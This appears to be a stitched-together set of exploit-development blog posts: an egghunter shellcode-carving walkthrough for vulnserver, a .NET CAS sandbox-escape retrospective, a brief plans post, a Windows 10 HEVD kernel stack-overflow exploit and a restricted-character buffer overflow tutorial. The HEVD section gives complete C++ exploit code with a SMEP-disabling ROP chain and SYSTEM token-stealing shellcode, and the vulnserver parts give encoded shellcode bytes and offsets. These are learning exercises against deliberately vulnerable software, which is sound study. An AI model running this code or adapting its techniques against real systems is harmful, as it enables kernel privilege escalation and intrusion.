Before we can start carving out the egghunter shellcode, we will need to align the ESP to point to the space below our first EB 08  at address 0012FB8D--this is where our egghunter shellcode will be decoded. 

We can see that ESP is currently pointed at 012F574 and we want to point to 0012FB8D


We will need to add 1561 to ESP


To align ESP, we need the following instructions:

PUSH ESP                   
POP EAX
ADD AX, 619
PUSH EAX
POP ESP

Keep in mind that we still need to avoid restricted characters...fortunately, the opcodes that correspond  to these instructions are not restricted

We execute the following instructions and we can see that our ESP now points to 0012FB8D


Again, we update our POC with our initial ESP realignment which will be the beginning of our egghunter shellcode


With our ESP aligned to where we want it to point....we can start carving out our egghunter shellcode.

Here's the original egghunter shellcode broken down into 4 bytes

#original egg hunter shellcode
\x68\x81\xcA\xFF
\x0F\x42\x52\x6A
\x02\x58\xCD\x2E
\x3C\x05\x5A\x74
\xEF\xb8\x54\x30
\x30\x57\x8b\xFA
\xAF\x75\xea\xAF
\x75\xE7\xFF\xE7

We will be using the EAX register to carve out the egghunter. Note that we need to zero out EAX first before we execute SUB instructions. We start from the last 4 bytes and work our way up.

zero_out_eax = "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"

This whole carving thing is straight black magic...it never ceases to amaze me.

#\x75\xe7\xff\xe7
#using hex/dword in windows calc
#0 - E7FFE775 = 1800 188B
#7950 5109 + 7950 5109 + 255F7679 = 1800 188B
#0 - 07950 5109 - 79505109 - 255F7679 = E7FFE775


These 4 bytes are encoded by doing some SUB instructions on EAX, then it gets pushed to the stack, and then they get decoded at the ESP address.



We will be doing this for the other 28 bytes

#\xaf\x75\xea\xaf
#using hex/dword in windows calc
#0 - AFEA75AF = 5015 8A51
#71094404 + 71094404  + 6E03 0249‬ =  5015 8A51
#0 - 71094404 - 71094404  - 6E03 0249 = AFEA75AF



\x30\x57\x8b\xfa
#using hex/dword in windows calc
#0 - FA8B 5730 = 0574 A8D0‬
#55093131 + 55093131  + 5B62 466E = 0574 A8D0‬
#0 - 55093131 - 55093131  - 5B62 466E = FA8B 5730


\xef\xb8\x54\x30
#using hex/dword in windows calc
#0 - 3054 B8EF = CFAB 4711
#56316666 +56316666  + 2348 7A45 = CFAB 4711
#0 - 56316666  - 56316666  - 2348 7A45 = 3054 B8EF



At this point, we have successfully carved out the first 16 bytes of our egghunter shellcode.

Note that we are getting close  our second EB 83 jmp…we will need to jump over this to get to the next 127 bytes of address space

I made a mistake on the ESP realignment that resulted in wasted address space. ESP should have been pointed to the end of our 41s as the stack grows bigger, the address becomes smaller.

This means we need ESP to be pointing at address 0012FBAC



Adjusted ESP alignment


This gives us about extra 32 bytes of address space….every byte counts!

We finish up the first 128 bytes by adding the first half of our zero_out_eax instructions and adding a jump short 10 bytes to go over the second EB 83 (I think we could have looped around too and just overwrite the first 16 bytes of our egghunter shellcode).



Our jump short brings us from address 0012FB2F to 0012FB3B and we successfully get over the second EB 83



Now we continue encoding the rest of our egghunter shellcode


#\x3c\x05\x5a\x74
#using hex/dword in windows calc
#0 - 745A053C = 8BA5 FAC4
#41214433 + 41214433 + 0963 725E = 8BA5 FAC4
#0 - 41214433 - 41214433 - 0963 725E = 745A053C


#\x02\x58\xcd\x2e
#using hex/dword in windows calc
#0 - 2ECD5802 = D132 A7FE
#657F3165 + 657F3165 + 06344534 =  D132 A7FE
#0 - 657F3165 - 657F3165 - 06344534 = 2ECD5802



Finally, we hit our last 4 bytes



That completes our egghunter shellcode…with literally 6 bytes left to spare with our address space

To test if our egghunter can find our egg, we add our egg "T00W" to the beginning of our Ds…and see if we can find it

...and we are successful. We found our Ds address space.



0x7 - Shellcode time!

I created a calc shellcode to see if we are able to pop a shellcode.


We go through our egghunter and add a breakpoint right before the jmp edi instruction and we can see that edi points to the beginning of our calc shellcode



Everything looks good, however, our shellcode just keeps on crashing the program and not spawn a calc.exe

After spending research, it looks like the ESP has to be realigned.

We align ESP with the address of EDX....then make it divisible by 4

PUSH EDX
POP ESP
AND, ESP FFFFFFF0             ----> make ESP divisible by 4




I update the shellcode to a reverse shell…pop the exploit one more time and we get a reverse shell





Final POC in my GitHub.

Thanks for reading!

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

By: tiraniddo
7 May 2020 at 23:12
It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
   
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandle f = lambda.Compile()

We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.


The Summer of PWN

By: h0mbre
5 May 2020 at 04:00

Summer Plans

Now that I finished the HEVD series of posts, it’s time for me to switch gears. The series became more of a chore as I progressed and the excercise felt quite silly for a few reasons. Primarily, there are still so many fundamental binary exploitation concepts that I still don’t know. Why was I spending so much time on very esoteric material when I haven’t even accomplished the basics? The material was tied closely to my wanting to take AWE with Offsec, but since that is not happening, I get to focus now on going back to the basics.

For the forseeable future, I’m going to be working primarily on leveling up my pwn skills by doing CTF challenges, reversing, analyzing malware, and developing.

Some of the tools I’m going to be using this summer (I’ll update this as I go along):

I will be keeping a daily log of everything I do and will publish it so those trying accomplish similar goals can see what I tried. I’ll also make a post at the end detailing what went right and what went wrong.

I’m taking a purposeful break from blogging so that I can focus on leveling up. Blogging takes a lot of my time and it’s interfering with my ability to put hours into getting better. I will hopefully be able to do a write-up detailing how I exploited a bug I found in another Windows kernel mode driver.

Keeping track of the Linux pwn challenge exploits here.

Until then, see you on the other side!

HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypass

By: h0mbre
4 May 2020 at 04:00

Introduction

This is going to be my last HEVD blog post. This was all of the exploits I wanted to hit when I started this goal in late January. We did quite a few, there are some definitely interesting ones left on the table and there is all of the Linux exploits as well. I’ll speak more about future posts in a future post (haha). I used Hacksys Extreme Vulnerable Driver 2.0 and Windows 10 Build 14393.rs1_release.160715-1616 for this exploit. Some of the newer Windows 10 builds were bugchecking this technique.

All of the exploit code can be found here.

Thanks

  • To @Cneelis for having such great shellcode in his similar exploit on a different Windows 10 build here: https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
  • To @abatchy17 for his awesome blog post on his SMEP bypass here: https://www.abatchy.com/2018/01/kernel-exploitation-4
  • To @ihack4falafel for helping me figure out where to return to after running my shellcode.

And as this is the last HEVD blog post, thanks to everyone who got me this far. As I’ve said every post so far, nothing I was doing is my own idea or technique, was simply recreating their exploits (or at least trying to) in order to learn more about the bug classes and learn more about the Windows kernel. (More thoughts on this later in a future blog post).

SMEP

We’ve already completed a Stack Overflow exploit for HEVD on Windows 7 x64 here; however, the problem is that starting with Windows 8, Microsoft implemented a new mitigation by default called Supervisor Mode Execution Prevention (SMEP). SMEP detects kernel mode code running in userspace stops us from being able to hijack execution in the kernel and send it to our shellcode pointer residing in userspace.

Bypassing SMEP

Taking my cues from Abatchy, I decided to try and bypass SMEP by using a well-known ROP chain technique that utilizes segments of code in the kernel to disable SMEP and then heads to user space to call our shellcode.

In the linked material above, you see that the CR4 register is responsible for enforcing this protection and if we look at Wikipedia, we can get a complete breakdown of CR4 and what its responsibilities are:

20 SMEP Supervisor Mode Execution Protection Enable If set, execution of code in a higher ring generates a fault.

So the 20th bit of the CR4 indicates whether or not SMEP is enforced. Since this vulnerability we’re attacking gives us the ability to overwrite the stack, we’re going to utilize a ROP chain consisting only of kernel space gadgets to disable SMEP by placing a new value in CR4 and then hit our shellcode in userspace.

Getting Kernel Base Address

The first thing we want to do, is to get the base address of the kernel. If we don’t get the base address, we can’t figure out what the offsets are to our gadgets that we want to use to bypass ASLR. In WinDBG, you can simply run lm sm to list all loaded kernel modules alphabetically:

---SNIP---
fffff800`10c7b000 fffff800`1149b000   nt
---SNIP---

We need a way also to get this address in our exploit code. For this part, I leaned heavily on code I was able to find by doing google searches with some syntax like: site:github.com NtQuerySystemInformation and seeing what I could find. Luckily, I was able to find a lot of code that met my needs perfectly. Unfortunately, on Windows 10 in order to use this API your process requires some level of elevation. But, I had already used the API previously and was quite fond of it for giving me so much trouble the first time I used it to get the kernel base address and wanted to use it again but this time in C++ instead of Python.

Using a lot of the tricks that I learned from @tekwizz123’s HEVD exploits, I was able to get the API exported to my exploit code and was able to use it effectively. I won’t go too much into the code here, but this is the function and the typedefs it references to retrieve the base address to the kernel for us:

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG				 Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

This code imports NtQuerySystemInformation from nt.dll and allows us to use it with the System Module Information parameter which returns to us a nice struct of a ModulesCount (how many kernel modules are loaded) and an array of the Modules themselves which have a lot of struct members included a Name. In all my research I couldn’t find an example where the kernel image wasn’t index value 0 so that’s what I’ve implemented here.

You could use a lot of the cool string functions in C++ to easily get the base address of any kernel mode driver as long as you have the name of the .sys file. You could cast the Modules.Name member to a string and do a substring match routine to locate your desired driver as you iterate through the array and return the base address. So now that we have the base address figured out, we can move on to hunting the gadgets.

Hunting Gadgets

The value of these gadgets is that they reside in kernel space so SMEP can’t interfere here. We can place them directly on the stack and overwrite rip so that we are always executing the first gadget and then returning to the stack where our ROP chain resides without ever going into user space. (If you have a preferred method for gadget hunting in the kernel let me know, I tried to script some things up in WinDBG but didn’t get very far before I gave up after it was clear it was super inefficient.) Original work on the gadget locations as far as I know is located here: http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html

Again, just following along with Abatchy’s blog, we can find Gadget 1 (actually the 2nd in our code) by locating a gadget that allows us to place a value into cr4 easily and then takes a ret soon after. Luckily for us, this gadget exists inside of nt!HvlEndSystemInterrupt.

We can find it in WinDBG with the following:

kd> uf HvlEndSystemInterrupt
nt!HvlEndSystemInterrupt:
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

nt!HvlEndSystemInterrupt+0x18:
fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

nt!HvlEndSystemInterrupt+0x1e:
fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

As Abatchy did, I’ve added a comment so you can see the gadget we’re after. We want this:

pop rcx

ret routine because if we can place an arbitrary value into rcx, there is a second gadget which allows us to mov cr4, rcx and then we’ll have everything we need.

Gadget 2 is nested within the KiEnableXSave kernel routine as follows (with some snipping) in WinDBG:

kd> uf nt!KiEnableXSave
nt!KiEnableXSave:

---SNIP---

nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret

So with these two gadgets locations known to us, as in, we know their offsets relative to the kernel base, we can now implement them in our code. So to be clear, our payload that we’ll be sending will look like this when we overwrite the stack:

  • ‘A’ characters * 2056
  • our pop rcx gadget
  • The value we want rcx to hold
  • our mov cr4, rcx gadget
  • pointer to our shellcode.

So for those following along at home, we will overwrite rip with our first gadget, it will pop the first 8 byte value on the stack into rcx. What value is that? Well, it’s the value that we want cr4 to hold eventually and we can simply place it onto the stack with our stack overflow. So we will pop that value into rcx and then the gadget will hit a ret opcode which will send the rip to our second gadget which will mov cr4, rcx so that cr4 now holds the SMEP-disabled value we want. The gadget will then hit a ret opcode and return rip to where? To a pointer to our userland shellcode that it will now run seemlessly because SMEP is disabled.

You can see this implemented in code here:

 BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

CR4 Value

Again, just following along with Abatchy, I’ll go ahead and place the value 0x70678 into cr4. In binary, 1110000011001111000 which would mean that the 20th bit, the SMEP bit, is set to 0. You can read more about what values to input here on j00ru’s blog post about SMEP.

So if cr4 holds this value, SMEP should be disabled.

Restoring Execution

The hardest part of this exploit for me was restoring execution after the shellcode ran. Unfortunately, our exploit overwrites several register values and corrupts our stack quite a bit. When my shellcode is done running (not really my shellcode, its borrowed from @Cneelis), this is what my callstack looked like along with my stack memory values:

Restoring execution will always be pretty specific to what version of HEVD you’re using and also perhaps what build of Windows you’re on as the some of the kernel routines will change, so I won’t go too much in depth here. But, what I did to figure out why I kept crashing so much after returning to the address in the screenshot of HEVD!IrpDeviceIoCtlHandler+0x19f which is located in the right hand side of the screenshot at ffff9e8196b99158, is that rsi is typically zero’d out if you send regular sized buffers to the driver routine.

So if you were to send a non-overflowing buffer, and put a breakpoint at nt!IopSynchronousServiceTail+0x1a0 (which is where rip would return if we took a ret out our address of ffff9e8196b99158), you would see that rsi is typically 0 when normally system service routines are exiting so when I returned, I had to have an rsi value of 0 in order to stop from getting an exception.

I tried just following the code through until I reached an exception with a non-zero rsi but wasn’t able to pinpoint exactly where the fault occurs or why. The debug information I got from all my bugchecks didn’t bring me any closer to the answer (probably user error). I noticed that if you don’t null out rsi before returning, rsi wouldn’t be referenced in any way until a value was popped into it from the stack which happened to be our IOCTL code, so this confused me even more.

Anyways, my hacky way of tracing through normally sized buffers and taking notes of the register values at the same point we return to out of our shellcode did work, but I’m still unsure why 😒.

Conclusion

All in all, the ROP chain to disable SMEP via cr4 wasn’t too complicated, this could even serve as introduction to ROP chains for some in my opinion because as far as ROP chains go this is fairly straightforward; however, restoring execution after our shellcode was a nightmare for me. A lot of time wasted by misinterpreting the callstack readouts from WinDBG (a lesson learned). As @ihack4falafel says, make sure you keep an eye on @rsp in your memory view in WinDBG anytime you are messing with the stack.

Exploit code here.

Thanks again to all the bloggers who got me through the HEVD exploits:

Huge thanks to HackSysTeam for developing the driver for us to all practice on, can’t wait to tackle it on Linux!

#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL                   0x222003

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver" << endl;
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: 0x" << hex
        << (INT64)hFile << endl;

    return hFile;
}

void send_payload(HANDLE hFile, INT64 kernel_base) {

    cout << "[>] Allocating RWX shellcode..." << endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        //find_system_proc:
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        //found_system:
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS
        "\xc3";

    LPVOID shellcode_addr = VirtualAlloc(NULL,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    cout << "[>] Shellcode allocated in userland at: 0x" << (INT64)shellcode_addr
        << endl;

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

    // keep this here for testing so you can see what normal buffers do to subsequent routines
    // to learn from for execution restoration
    /*
    BYTE input_buff[2048] = { 0 };
    memset(input_buff, '\x41', 2048);
    */

    cout << "[>] Input buff located at: 0x" << (INT64)&input_buff << endl;

    DWORD bytes_ret = 0x0;

    cout << "[>] Sending payload..." << endl;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        sizeof(input_buff),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {
        cout << "[!] DeviceIoControl failed!" << endl;
    }
}

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

void spawn_shell() {

    cout << "[>] Spawning nt authority/system shell..." << endl;

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));

    CreateProcessA("C:\\Windows\\System32\\cmd.exe",
        NULL,
        NULL,
        NULL,
        0,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi);
}

int main() {

    HANDLE hFile = grab_handle();

    INT64 kernel_base = get_kernel_base();
    send_payload(hFile, kernel_base);
    spawn_shell();
}

Buffer Overflow w/ Restricted Characters

 Buffer Overflow Vulnerability w/ restricted characters

Kali Linux
Windows Vista
Vulnerable application: vulnserver.exe (LTER)


Vulnserver.exe is meant to be exploited mainly with buffer overflows vulnerabilities. More info about this application and where to download it can be found here:



~~~~~//********//~~~~~~


For the LTER command, there are two ways to exploit the buffer overflow vulnerability, however, both exploits will have similar restricted characters

- Part 1: Vanilla Buffer Overflow w/ Restricted Characters
- Part 2: SEH base Buffer Overflow w/ Restricted Characters.....click here for  Part 2

Let's get started...

Fuzzing

Similar to the GMON write-up, I used boofuzz to do the initial fuzzing.

...and after crashing the program, we recreate the crash using the follow Proof-of-Concept


We get a pretty vanilla buffer overflow where the EIP has been overwritten with 41s

Also note that ESP currently points to our buffer. This is key once we figure out an address to redirect our EIP


Now we will need to determine our offset and see exactly which part of our buffer overwrites the EIP register.

As usual, this is accomplished using Metasploit's patter_create.rb to generate 3000 unique characters.


Update our POC with our unique characters, send the exploit, and examine the crash in immunity debugger.


Here we can see that EIP has been overwritten with the following values: 386F4337


Metasploit's pattern_offset.rb can be used to determine the offset with this value.

Once we determine the offset, we update our POC again



We send the POC one more time and examine the crash...if our offset is correct, EIP should be overwritten with x42s

In this case, we can see 42424242 were successfully loaded into the EIP register


Finding bad characters

Now that we are able to redirect our EIP...we will need to find an address to redirect the EIP. Since we know that ESP register points to our buffer, we will be looking for a JMP ESP address.

However, before we choose an address, we will need to verify if there are any bad characters.

We update the POC with the following 256 unique hex characters


After running a few test, it's verified that anything over 7F is being subtracted by 7F as we can see below in our dump….such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f



Now we will need a call esp or jmp esp address…this will ultimately call our 'Cs' where our reverse shell will be loaded while Kkeeping in mind the restricted characters.

We find the following address using mona.py in immunity debugger

FF E4 = jmp esp
Address: 62501203


We can verify this address is a JMP ESP by searching it



